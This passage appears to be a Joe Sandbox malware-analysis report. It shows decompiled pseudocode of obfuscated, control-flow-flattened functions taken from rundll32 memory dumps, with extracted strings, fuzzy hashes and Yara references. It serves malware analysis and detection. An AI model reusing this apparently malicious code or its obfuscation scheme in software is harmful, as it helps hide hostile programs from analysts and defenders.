				_v40 = _v40 ^ 0x00002cee;
				_v60 = 0x3598;
				_v60 = _v60 + 0xffff8bc6;
				_v60 = _v60 + 0xffffa8a6;
				_v60 = _v60 ^ 0xffff128a;
				_v48 = 0x4fef;
				_v48 = _v48 ^ 0xca9c5515;
				_v48 = _v48 + 0xb16f;
				_v48 = _v48 ^ 0xca9cd0c6;
				_v92 = 0xaa9;
				_t266 = 0x5f;
				_v92 = _v92 / _t266;
				_v92 = _v92 + 0xffff3c6a;
				_t267 = 0x59;
				_v92 = _v92 / _t267;
				_v92 = _v92 ^ 0x02e036a9;
				_v96 = 0x5de2;
				_v96 = _v96 + 0xffffe6a1;
				_v96 = _v96 << 0xa;
				_v96 = _v96 >> 6;
				_v96 = _v96 ^ 0x00042069;
				_v36 = 0x38d5;
				_v36 = _v36 >> 9;
				_v36 = _v36 ^ 0x00004e11;
				_v28 = 0x56eb;
				_v28 = _v28 | 0x64f5fc98;
				_v28 = _v28 ^ 0x64f5ec13;
				_v32 = 0x795a;
				_v32 = _v32 + 0x3d0e;
				_v32 = _v32 ^ 0x0000bf29;
				_v24 = 0xb411;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x000029d3;
				_v88 = 0x662b;
				_v88 = _v88 + 0xffff211d;
				_v88 = _v88 >> 0xa;
				_v88 = _v88 + 0xa5d0;
				_v88 = _v88 ^ 0x0040a179;
				_v76 = 0x93a7;
				_v76 = _v76 | 0xd5df8e88;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0xa2f79e4d;
				_v76 = _v76 ^ 0xafaa69d8;
				_v44 = 0x9179;
				_v44 = _v44 | 0xc93173a7;
				_v44 = _v44 + 0xffff069d;
				_v44 = _v44 ^ 0xc930e98d;
				_v80 = 0xde50;
				_v80 = _v80 << 1;
				_v80 = _v80 ^ 0x604d01d6;
				_v80 = _v80 | 0x2ae37b3d;
				_v80 = _v80 ^ 0x6aefa4f8;
				_v84 = 0xd578;
				_v84 = _v84 << 0xe;
				_t268 = 0x68;
				_v84 = _v84 / _t268;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0000750e;
				_v64 = 0x2e2a;
				_v64 = _v64 << 3;
				_t269 = 0x30;
				_v64 = _v64 / _t269;
				_v64 = _v64 + 0xffff5448;
				_v64 = _v64 ^ 0xffff6494;
				_v68 = 0x2d37;
				_t270 = 0xc;
				_v68 = _v68 / _t270;
				_v68 = _v68 >> 0x10;
				_t271 = 0x67;
				_v68 = _v68 / _t271;
				_v68 = _v68 ^ 0x00004502;
				_v12 = 0x26d1;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x026d46c6;
				_v72 = 0x25a0;
				_v72 = _v72 * 0x64;
				_v72 = _v72 << 0xf;
				_v72 = _v72 | 0x287c3bd2;
				_v72 = _v72 ^ 0x797c3acd;
				_v4 = 0x7952;
				_v4 = _v4 * 0x12;
				_v4 = _v4 ^ 0x0008812f;
				_v8 = 0x95b5;
				_v8 = _v8 + 0xffff9cc1;
				_v8 = _v8 ^ 0x000073a2;
				while(1) {
					L1:
					_t250 = 0x6ec61ec;
					while(1) {
						L2:
						_t272 = 0x5c1247c;
						do {
							L3:
							while(_t308 != 0x28e0d0b) {
								if(_t308 == 0x57801b6) {
									return E0043DE81(_v4, _t307, _v8);
								}
								if(_t308 == _t272) {
									 *((intOrPtr*)(_t307 + 0x44)) = _t262;
									_t253 =  *0x451084;
									 *_t307 = _t253;
									 *0x451084 = _t307;
									return _t253;
								}
								if(_t308 == 0x6d0b453) {
									_push(_t272);
									_t301 = 0x50;
									_t256 = E004354FB(_t301);
									_t307 = _t256;
									__eflags = _t307;
									if(__eflags == 0) {
										return _t256;
									}
									_t308 = 0x22b948bf;
									while(1) {
										L1:
										_t250 = 0x6ec61ec;
										L2:
										_t272 = 0x5c1247c;
										goto L3;
									}
								}
								if(_t308 == _t250) {
									_push(E0044C192);
									_push(_v84);
									_push(_t272);
									_push(_v80);
									_push(_v44);
									_t257 = E0043903E(_t307, _v76);
									_t312 = _t312 - 0xc + 0x20;
									 *((intOrPtr*)(_t307 + 0x28)) = _t257;
									__eflags = _t257;
									_t272 = 0x5c1247c;
									_t250 = 0x6ec61ec;
									_t308 =  !=  ? 0x5c1247c : 0x28e0d0b;
									continue;
								}
								if(_t308 == 0x206c9a2f) {
									_t258 = E00433B5C( *((intOrPtr*)(_t307 + 8)), _v24, _v88);
									_t312 =  &(_t312[1]);
									 *((intOrPtr*)(_t307 + 0x18)) = _t258;
									__eflags = _t258;
									_t250 = 0x6ec61ec;
									_t308 =  !=  ? 0x6ec61ec : 0x28e0d0b;
									goto L2;
								}
								_t321 = _t308 - 0x22b948bf;
								if(_t308 != 0x22b948bf) {
									goto L18;
								}
								_push(_t272);
								_t259 = E00435B7D(_v52, _t311, _t321, _v56, _v40, _v60);
								_t312 =  &(_t312[4]);
								 *((intOrPtr*)(_t307 + 8)) = _t259;
								if(_t259 == 0) {
									_t308 = 0x57801b6;
								} else {
									E00435696(_v48,  *((intOrPtr*)(_t307 + 8)), _v92, _v96,  *((intOrPtr*)(_t307 + 8)), _v36);
									_push(_v32);
									E00441A48( *((intOrPtr*)(_t307 + 8)));
									_t312 =  &(_t312[5]);
									_t308 = 0x206c9a2f;
								}
								goto L1;
							}
							E0044A8BF(_v64, _v68, _v12, _v72,  *((intOrPtr*)(_t307 + 8)));
							_t312 =  &(_t312[3]);
							_t308 = 0x57801b6;
							_t250 = 0x6ec61ec;
							_t272 = 0x5c1247c;
							L18:
							__eflags = _t308 - 0x6c42194;
						} while (__eflags != 0);
						return _t250;
					}
				}
			}

0x0044d70b
0x0044d70e
0x0044d716
0x0044d71b
0x0044d723
0x0044d733
0x0044d735
0x0044d73b
0x0044d73d
0x0044d742
0x0044d748
0x0044d750
0x0044d755
0x0044d75d
0x0044d765
0x0044d76d
0x0044d775
0x0044d77d
0x0044d789
0x0044d78e
0x0044d794
0x0044d79c
0x0044d7a4
0x0044d7a9
0x0044d7b1
0x0044d7b9
0x0044d7c1
0x0044d7c9
0x0044d7d1
0x0044d7d9
0x0044d7e1
0x0044d7e9
0x0044d7f1
0x0044d7fd
0x0044d802
0x0044d808
0x0044d814
0x0044d817
0x0044d81b
0x0044d823
0x0044d82b
0x0044d833
0x0044d838
0x0044d83d
0x0044d845
0x0044d84d
0x0044d852
0x0044d85a
0x0044d862
0x0044d86a
0x0044d872
0x0044d87a
0x0044d882
0x0044d88a
0x0044d892
0x0044d897
0x0044d89f
0x0044d8a7
0x0044d8af
0x0044d8b4
0x0044d8bc
0x0044d8c4
0x0044d8cc
0x0044d8d6
0x0044d8db
0x0044d8e3
0x0044d8eb
0x0044d8f3
0x0044d8fb
0x0044d903
0x0044d90b
0x0044d913
0x0044d917
0x0044d91f
0x0044d927
0x0044d92f
0x0044d937
0x0044d942
0x0044d947
0x0044d94d
0x0044d952
0x0044d95a
0x0044d962
0x0044d96b
0x0044d970
0x0044d976
0x0044d97e
0x0044d986
0x0044d992
0x0044d997
0x0044d99d
0x0044d9a6
0x0044d9a9
0x0044d9ad
0x0044d9b5
0x0044d9bd
0x0044d9c2
0x0044d9ca
0x0044d9d7
0x0044d9db
0x0044d9e0
0x0044d9e8
0x0044d9f0
0x0044d9fd
0x0044da01
0x0044da09
0x0044da11
0x0044da19
0x0044da21
0x0044da21
0x0044da21
0x0044da26
0x0044da26
0x0044da26
0x0044da2b
0x00000000
0x0044da2b
0x0044da3d
0x00000000
0x0044dbbb
0x0044da45
0x0044db9a
0x0044db9d
0x0044dba2
0x0044dba4
0x00000000
0x0044dba4
0x0044da51
0x0044db48
0x0044db4b
0x0044db4c
0x0044db51
0x0044db54
0x0044db56
0x0044dbc3
0x0044dbc3
0x0044db58
0x0044da21
0x0044da21
0x0044da21
0x0044da26
0x0044da26
0x00000000
0x0044da26
0x0044da21
0x0044da59
0x0044db01
0x0044db09
0x0044db0d
0x0044db0e
0x0044db14
0x0044db1c
0x0044db21
0x0044db24
0x0044db27
0x0044db2e
0x0044db33
0x0044db38
0x00000000
0x0044db38
0x0044da65
0x0044dae2
0x0044dae7
0x0044daea
0x0044daed
0x0044daf4
0x0044daf9
0x00000000
0x0044daf9
0x0044da67
0x0044da6d
0x00000000
0x00000000
0x0044da73
0x0044da86
0x0044da8b
0x0044da8e
0x0044da93
0x0044dacd
0x0044da95
0x0044daab
0x0044dab0
0x0044dabb
0x0044dac0
0x0044dac3
0x0044dac3
0x00000000
0x0044da93
0x0044db75
0x0044db7a
0x0044db7d
0x0044db82
0x0044db87
0x0044db8c
0x0044db8c
0x0044db8c
0x00000000
0x0044da2b
0x0044da26

Strings

+f, xrefs: 0044D89F
V, xrefs: 0044D85A
Ry, xrefs: 0044D9F0
Zy, xrefs: 0044D872
,, xrefs: 0044D7A9
={*, xrefs: 0044D91F
O, xrefs: 0044D7D1
*., xrefs: 0044D95A
], xrefs: 0044D823
7-, xrefs: 0044D986

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *.$+f$7-$={*$Ry$Zy$,$O$V$]
API String ID: 0-2837054829
Opcode ID: 918e67a5a28f85cd2f30ac9c324648403fb0670c42575e72c03f6dd780d8b6bd
Instruction ID: cce3e5592b96ffd31b3835e9d737f0511045125f2a75731e51e1b3f63f9a5535
Opcode Fuzzy Hash: 918e67a5a28f85cd2f30ac9c324648403fb0670c42575e72c03f6dd780d8b6bd
Instruction Fuzzy Hash: E8C16571A087409BE358CF21C48A40BBBE1FBD5744F104A2EF596962A0D3B9D919CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0018CC7F, Relevance: 12.8, Strings: 10, Instructions: 258COMMON

Download Yara Rule

Strings

={*, xrefs: 0018CE93
], xrefs: 0018CD97
+f, xrefs: 0018CE13
7-, xrefs: 0018CEFA
Zy, xrefs: 0018CDE6
V, xrefs: 0018CDCE
Ry, xrefs: 0018CF64
O, xrefs: 0018CD45
,, xrefs: 0018CD1D
*., xrefs: 0018CECE

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *.$+f$7-$={*$Ry$Zy$,$O$V$]
API String ID: 0-2837054829
Opcode ID: 2ed46f64f244493fecafb7046f423cfd3950949ac396ee6e8883002bcc409040
Instruction ID: fd3673d136bb841126a9f81d66620ffb435af6b37a1bdb687d523056941233d4
Opcode Fuzzy Hash: 2ed46f64f244493fecafb7046f423cfd3950949ac396ee6e8883002bcc409040
Instruction Fuzzy Hash: A5C166719083409FD358DF25C88A40BBBF2FBD5714F108A1DF59A962A0D3B5D959CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00433B74, Relevance: 12.7, Strings: 10, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00433B74() {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t230;
				intOrPtr* _t236;
				signed int _t239;
				intOrPtr* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				void* _t247;
				void* _t273;
				signed int* _t277;

				_t277 =  &_v104;
				_v8 = 0x3773eb;
				_v4 = 0;
				_v32 = 0xef71;
				_v32 = _v32 | 0x54f813f9;
				_v32 = _v32 ^ 0xd4f8fff8;
				_v24 = 0x7557;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0x3aab8002;
				_v40 = 0xe4a5;
				_v40 = _v40 + 0xc2ea;
				_v40 = _v40 ^ 0x0001a89f;
				_v92 = 0x30e1;
				_v92 = _v92 << 5;
				_v92 = _v92 << 5;
				_v92 = _v92 | 0xbe715f5e;
				_v92 = _v92 ^ 0xbef39162;
				_v96 = 0x800f;
				_v96 = _v96 >> 0xc;
				_v96 = _v96 ^ 0x80e6ae84;
				_v96 = _v96 >> 0xe;
				_v96 = _v96 ^ 0x00021582;
				_v44 = 0x11be;
				_v12 = 0;
				_t273 = 0x2fb03e9c;
				_t242 = 0x1d;
				_v44 = _v44 / _t242;
				_v44 = _v44 ^ 0x000025b0;
				_v52 = 0xe658;
				_v52 = _v52 >> 5;
				_v52 = _v52 << 0xc;
				_v52 = _v52 ^ 0x007363dc;
				_v76 = 0x5b3a;
				_t243 = 0x5d;
				_v76 = _v76 * 0x4c;
				_v76 = _v76 ^ 0x14ef7786;
				_v76 = _v76 ^ 0x3048edb2;
				_v76 = _v76 ^ 0x24bca182;
				_v80 = 0xa333;
				_v80 = _v80 / _t243;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 | 0x62916cec;
				_v80 = _v80 ^ 0x629113ba;
				_v28 = 0x738c;
				_v28 = _v28 + 0xfffff99e;
				_v28 = _v28 ^ 0x00000a6b;
				_v56 = 0x3e6f;
				_t244 = 0xc;
				_v56 = _v56 / _t244;
				_v56 = _v56 | 0xe9662750;
				_v56 = _v56 ^ 0xe9666ada;
				_v36 = 0x6860;
				_t245 = 0x2d;
				_v36 = _v36 / _t245;
				_v36 = _v36 ^ 0x00001ef2;
				_v84 = 0x885e;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 << 6;
				_v84 = _v84 + 0xffffce7b;
				_v84 = _v84 ^ 0xffffd5d3;
				_v88 = 0xb8f7;
				_v88 = _v88 ^ 0xd543d054;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 + 0xffffaf1d;
				_v88 = _v88 ^ 0x001a1dea;
				_v60 = 0x284b;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 4;
				_v60 = _v60 ^ 0x00281b1d;
				_v72 = 0x3dfc;
				_t246 = 0x58;
				_t239 = _v12;
				_v72 = _v72 / _t246;
				_v72 = _v72 + 0x95dc;
				_v72 = _v72 ^ 0xd14426bc;
				_v72 = _v72 ^ 0xd1448cb1;
				_v48 = 0xe934;
				_v48 = _v48 | 0xd53a3366;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x03548d4a;
				_v20 = 0x964c;
				_v20 = _v20 * 0x17;
				_v20 = _v20 ^ 0x000de1e5;
				_v100 = 0x9e1;
				_v100 = _v100 ^ 0xf4897f8a;
				_v100 = _v100 ^ 0x36e5ee60;
				_v100 = _v100 | 0xb880b9d7;
				_v100 = _v100 ^ 0xfaecd773;
				_v104 = 0xd03a;
				_v104 = _v104 ^ 0x48aea30f;
				_v104 = _v104 + 0x939c;
				_v104 = _v104 >> 2;
				_v104 = _v104 ^ 0x122bf007;
				_v64 = 0xf900;
				_v64 = _v64 | 0x2edbad32;
				_v64 = _v64 << 0xf;
				_v64 = _v64 | 0x270e07c3;
				_v64 = _v64 ^ 0xff9f7a70;
				_v68 = 0xa250;
				_v68 = _v68 << 0xc;
				_v68 = _v68 + 0x89c3;
				_v68 = _v68 * 0x55;
				_v68 = _v68 ^ 0x5e76c64d;
				while(1) {
					L1:
					_t247 = 0x5c;
					while(1) {
						_t230 = 0x2118c244;
						do {
							L3:
							while(_t273 != 0x1831a392) {
								if(_t273 == _t230) {
									_t236 = E00441EDA(_v100, _t239, _v16, _v104);
									_t273 = 0x371ab96e;
									__eflags = _t236;
									_v12 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t273 == 0x25797f14) {
										_t241 =  *0x451088 + 0x38;
										while(1) {
											__eflags =  *_t241 - _t247;
											if(__eflags == 0) {
												break;
											}
											_t241 = _t241 + 2;
											__eflags = _t241;
										}
										_t239 = _t241 + 2;
										_t273 = 0x1831a392;
										_t230 = 0x2118c244;
										continue;
									} else {
										if(_t273 == 0x2fb03e9c) {
											_t273 = 0x25797f14;
											continue;
										} else {
											if(_t273 != 0x371ab96e) {
												goto L17;
											} else {
												E004470CF(_v64, _v68, _v16);
											}
										}
									}
								}
								L9:
								return _v12;
							}
							_push(0x431368);
							_push(_v44);
							_push(_v96);
							_t248 = _v40;
							__eflags = E00440A84(E00435DFC(_v40, _v92, __eflags), _v52, _v24, _v76, _v80, _v40, _v28, _v40,  &_v16, _v32, _t248, _t248, _v56, _v36, _v84, _v88, _t248, _v60);
							_t273 =  ==  ? 0x2118c244 : 0x27c3a10;
							E00440D6D(_v72, _v48, _v20, _t231);
							_t277 =  &(_t277[0x15]);
							_t230 = 0x2118c244;
							_t247 = 0x5c;
							L17:
							__eflags = _t273 - 0x27c3a10;
						} while (__eflags != 0);
						goto L9;
					}
				}
			}

0x00433b74
0x00433b7b
0x00433b85
0x00433b8b
0x00433b93
0x00433b9b
0x00433ba3
0x00433bab
0x00433bb0
0x00433bb8
0x00433bc0
0x00433bc8
0x00433bd0
0x00433bd8
0x00433bdd
0x00433be2
0x00433bea
0x00433bf2
0x00433bfa
0x00433bff
0x00433c07
0x00433c0c
0x00433c14
0x00433c1c
0x00433c20
0x00433c2b
0x00433c30
0x00433c36
0x00433c3e
0x00433c46
0x00433c4b
0x00433c50
0x00433c58
0x00433c65
0x00433c68
0x00433c6c
0x00433c74
0x00433c7c
0x00433c84
0x00433c94
0x00433c98
0x00433c9d
0x00433ca5
0x00433cad
0x00433cb5
0x00433cbd
0x00433cc5
0x00433cd1
0x00433cd6
0x00433cdc
0x00433ce4
0x00433cec
0x00433cf8
0x00433cfb
0x00433cff
0x00433d07
0x00433d0f
0x00433d14
0x00433d19
0x00433d21
0x00433d29
0x00433d33
0x00433d40
0x00433d45
0x00433d4d
0x00433d55
0x00433d5d
0x00433d62
0x00433d67
0x00433d6f
0x00433d7d
0x00433d80
0x00433d84
0x00433d88
0x00433d90
0x00433d98
0x00433da0
0x00433da8
0x00433db0
0x00433db5
0x00433dbd
0x00433dca
0x00433dce
0x00433dd6
0x00433dde
0x00433de6
0x00433dee
0x00433df6
0x00433dfe
0x00433e06
0x00433e0e
0x00433e16
0x00433e1b
0x00433e23
0x00433e2b
0x00433e33
0x00433e38
0x00433e40
0x00433e48
0x00433e50
0x00433e55
0x00433e62
0x00433e66
0x00433e6e
0x00433e6e
0x00433e70
0x00433e71
0x00433e71
0x00433e76
0x00000000
0x00433e76
0x00433e80
0x00433eeb
0x00433ef4
0x00433ef9
0x00433efe
0x00000000
0x00433e82
0x00433e88
0x00433ec9
0x00433ed1
0x00433ed1
0x00433ed4
0x00000000
0x00000000
0x00433ece
0x00433ece
0x00433ece
0x00433ed6
0x00433ed9
0x00433e71
0x00000000
0x00433e8a
0x00433e90
0x00433ebc
0x00000000
0x00433e92
0x00433e98
0x00000000
0x00433e9e
0x00433eaa
0x00433eaf
0x00433e98
0x00433e90
0x00433e88
0x00433eb0
0x00433ebb
0x00433ebb
0x00433f07
0x00433f0c
0x00433f10
0x00433f18
0x00433f6c
0x00433f8b
0x00433f8e
0x00433f93
0x00433f96
0x00433f9d
0x00433f9e
0x00433f9e
0x00433f9e
0x00000000
0x00433faa
0x00433e71

Strings

k, xrefs: 00433DC5
0, xrefs: 00433BD0
:[, xrefs: 00433C58
K(, xrefs: 00433D55
P'f, xrefs: 00433CDC
s7, xrefs: 00433B7B
`h, xrefs: 00433CEC
k, xrefs: 00433CBD
`6, xrefs: 00433DE6
4, xrefs: 00433DA0

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4$:[$K($P'f$`h$`6$k$0$s7$k
API String ID: 0-1983453149
Opcode ID: 8a105d492f105c8267afc66e207a746e20f675f3904b7488f6b45f27a8b84197
Instruction ID: 554d580bb60f245a07d783987d70cc941380f9542d155c70ce75b6953cee7ceb
Opcode Fuzzy Hash: 8a105d492f105c8267afc66e207a746e20f675f3904b7488f6b45f27a8b84197
Instruction Fuzzy Hash: F1B122725093809FE359CF25C88A90BBBE2FBC4748F10891DF596862A0D7B5CA49CF47

Uniqueness

Uniqueness Score: -1.00%

Function 001730E8, Relevance: 12.7, Strings: 10, Instructions: 225COMMON

Download Yara Rule

Strings

k, xrefs: 00173339
k, xrefs: 00173231
P'f, xrefs: 00173250
4, xrefs: 00173314
:[, xrefs: 001731CC
s7, xrefs: 001730EF
K(, xrefs: 001732C9
`h, xrefs: 00173260
`6, xrefs: 0017335A
0, xrefs: 00173144

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4$:[$K($P'f$`h$`6$k$0$s7$k
API String ID: 0-1983453149
Opcode ID: 9cb91b622d7dbfd864413f4ab6b3a5654de06be3923bf00214682f10b5a64c76
Instruction ID: b5351b6244645fe0137ce1ee48985b1d90a765efc8abee91b42756df46aec915
Opcode Fuzzy Hash: 9cb91b622d7dbfd864413f4ab6b3a5654de06be3923bf00214682f10b5a64c76
Instruction Fuzzy Hash: B4B113725093809FD359CF25C88A90BBBF1FBD4748F10891DF59A962A0D7B5CA49CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00437731, Relevance: 12.7, Strings: 10, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00437731(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t170;
				intOrPtr* _t191;
				void* _t193;
				intOrPtr _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				void* _t215;
				signed int* _t217;

				_push(_a20);
				_t191 = __edx;
				_t215 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t170);
				_v12 = 0x49dec4;
				_t209 = 0;
				_v8 = 0x408154;
				_t217 =  &(( &_v84)[7]);
				_v4 = 0;
				_v52 = 0x694b;
				_t193 = 0x182a63aa;
				_v52 = _v52 + 0xffff5e5b;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0fff8bf7;
				_v56 = 0x41f7;
				_v56 = _v56 + 0x4138;
				_t210 = 0x11;
				_v56 = _v56 * 0x3c;
				_v56 = _v56 ^ 0x001ebd7f;
				_v24 = 0x2024;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x000030b8;
				_v28 = 0xded3;
				_v28 = _v28 / _t210;
				_v28 = _v28 ^ 0x00001e19;
				_v32 = 0xc31c;
				_t211 = 9;
				_v32 = _v32 * 0x46;
				_v32 = _v32 ^ 0x00354647;
				_v60 = 0x23e0;
				_v60 = _v60 << 0xa;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x047c537c;
				_v64 = 0xeb08;
				_v64 = _v64 / _t211;
				_v64 = _v64 << 0x10;
				_v64 = _v64 ^ 0x1a1d4286;
				_v68 = 0x30b7;
				_v68 = _v68 | 0x586a18cc;
				_v68 = _v68 ^ 0x9b6ff92b;
				_v68 = _v68 ^ 0xc305ffb2;
				_v84 = 0x4a65;
				_t212 = 0x11;
				_v84 = _v84 * 0x7e;
				_v84 = _v84 + 0x6e5;
				_v84 = _v84 ^ 0x53a45cff;
				_v84 = _v84 ^ 0x5380fb2a;
				_v48 = 0xcc07;
				_v48 = _v48 + 0x32ac;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0007ae20;
				_v72 = 0xea77;
				_v72 = _v72 * 0x14;
				_v72 = _v72 + 0x41ea;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00013230;
				_v16 = 0x78a9;
				_v16 = _v16 + 0xaadf;
				_v16 = _v16 ^ 0x000171b6;
				_v36 = 0x9bd0;
				_v36 = _v36 ^ 0xa8005f8b;
				_v36 = _v36 | 0xb140c83a;
				_v36 = _v36 ^ 0xb940c62b;
				_v76 = 0x6529;
				_v76 = _v76 + 0x50c8;
				_v76 = _v76 | 0xe567bb7e;
				_v76 = _v76 ^ 0xe5678af7;
				_v20 = 0x8b43;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x8b433351;
				_v40 = 0x866a;
				_t213 = 0x19;
				_t214 = _v16;
				_v40 = _v40 / _t213;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x00003fe9;
				_v44 = 0xef9a;
				_v44 = _v44 * 0x21;
				_v44 = _v44 << 0xe;
				_v44 = _v44 ^ 0xb8b6d4b8;
				_v80 = 0x5ae9;
				_v80 = _v80 + 0xb2b1;
				_v80 = _v80 | 0x3da6d513;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x003dfd01;
				while(_t193 != 0x182a63aa) {
					if(_t193 == 0x251a2d5f) {
						_t163 =  &_v40; // 0x354647
						E0044B94A(_t209, _t214, _t215, _t193, _t193, _a4, _v72, _v16, _v36, _t193, _v76, _v20,  *_t163, _a20, _v44, _v80);
						if(_t191 != 0) {
							 *_t191 = _t214;
						}
						L14:
						return _t209;
					}
					if(_t193 == 0x2efe34a0) {
						_push(_t193);
						_t209 = E004354FB(_t214);
						if(_t209 == 0) {
							goto L14;
						}
						_t193 = 0x251a2d5f;
						continue;
					}
					if(_t193 != 0x34522f7d) {
						L10:
						if(_t193 != 0x226dac5d) {
							continue;
						}
						goto L14;
					}
					_t214 = E0044B94A(0, 0, _t215, _t193, _t193, _a4, _v52, _v56, _v24, _t193, _v28, _v32, _v60, _a20, _v64, _v68);
					_t217 =  &(_t217[0xe]);
					if(_t214 == 0) {
						goto L14;
					}
					_t193 = 0x2efe34a0;
				}
				_t193 = 0x34522f7d;
				goto L10;
			}

0x00437738
0x0043773c
0x0043773e
0x00437740
0x00437744
0x00437748
0x0043774c
0x00437750
0x00437751
0x00437752
0x00437757
0x0043775f
0x00437761
0x00437769
0x0043776c
0x00437772
0x0043777a
0x0043777f
0x00437787
0x0043778c
0x00437794
0x0043779c
0x004377ab
0x004377ae
0x004377b2
0x004377ba
0x004377c2
0x004377c7
0x004377cf
0x004377df
0x004377e3
0x004377eb
0x004377f8
0x004377fb
0x004377ff
0x00437807
0x0043780f
0x00437814
0x00437819
0x00437821
0x00437831
0x00437835
0x0043783a
0x00437842
0x0043784a
0x00437852
0x0043785a
0x00437862
0x0043786f
0x00437870
0x00437874
0x0043787c
0x00437884
0x0043788c
0x00437894
0x0043789c
0x004378a1
0x004378a9
0x004378b6
0x004378ba
0x004378c8
0x004378cc
0x004378d6
0x004378de
0x004378e6
0x004378ee
0x004378f6
0x004378fe
0x00437906
0x0043790e
0x00437916
0x0043791e
0x00437926
0x0043792e
0x00437936
0x0043793b
0x00437943
0x00437951
0x00437954
0x00437958
0x0043795c
0x00437961
0x00437969
0x00437976
0x0043797a
0x0043797f
0x00437987
0x0043798f
0x00437997
0x0043799f
0x004379a4
0x004379ac
0x004379be
0x00437a64
0x00437a89
0x00437a93
0x00437a95
0x00437a95
0x00437a97
0x00437aa0
0x00437aa0
0x004379ca
0x00437a29
0x00437a2f
0x00437a34
0x00000000
0x00000000
0x00437a36
0x00000000
0x00437a36
0x004379d2
0x00437a45
0x00437a4b
0x00000000
0x00000000
0x00000000
0x00437a51
0x00437a0f
0x00437a11
0x00437a16
0x00000000
0x00000000
0x00437a18
0x00437a18
0x00437a40
0x00000000

Strings

Ki, xrefs: 00437772
}/R4, xrefs: 00437A40
GF5, xrefs: 00437A64
)e, xrefs: 0043790E
$ , xrefs: 004377BA
Z, xrefs: 00437987
?, xrefs: 00437961
#, xrefs: 00437807
}/R4, xrefs: 004379CC
A, xrefs: 004378BA

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $ $)e$GF5$Ki$}/R4$}/R4$#$?$A$Z
API String ID: 0-3391024520
Opcode ID: 0781afec3e73dc80d09e5051321a0b1847496af7c9a5a3afd5f875a495ca2731
Instruction ID: f6c7f3000c0c2351d5d0f6384c89793079683f1bb1c206e76483ba8d224a9cfb
Opcode Fuzzy Hash: 0781afec3e73dc80d09e5051321a0b1847496af7c9a5a3afd5f875a495ca2731
Instruction Fuzzy Hash: BB9133710083809FE359DF65C58981FFBE1BBC8758F10990DF29696260C3BA8A59CF47

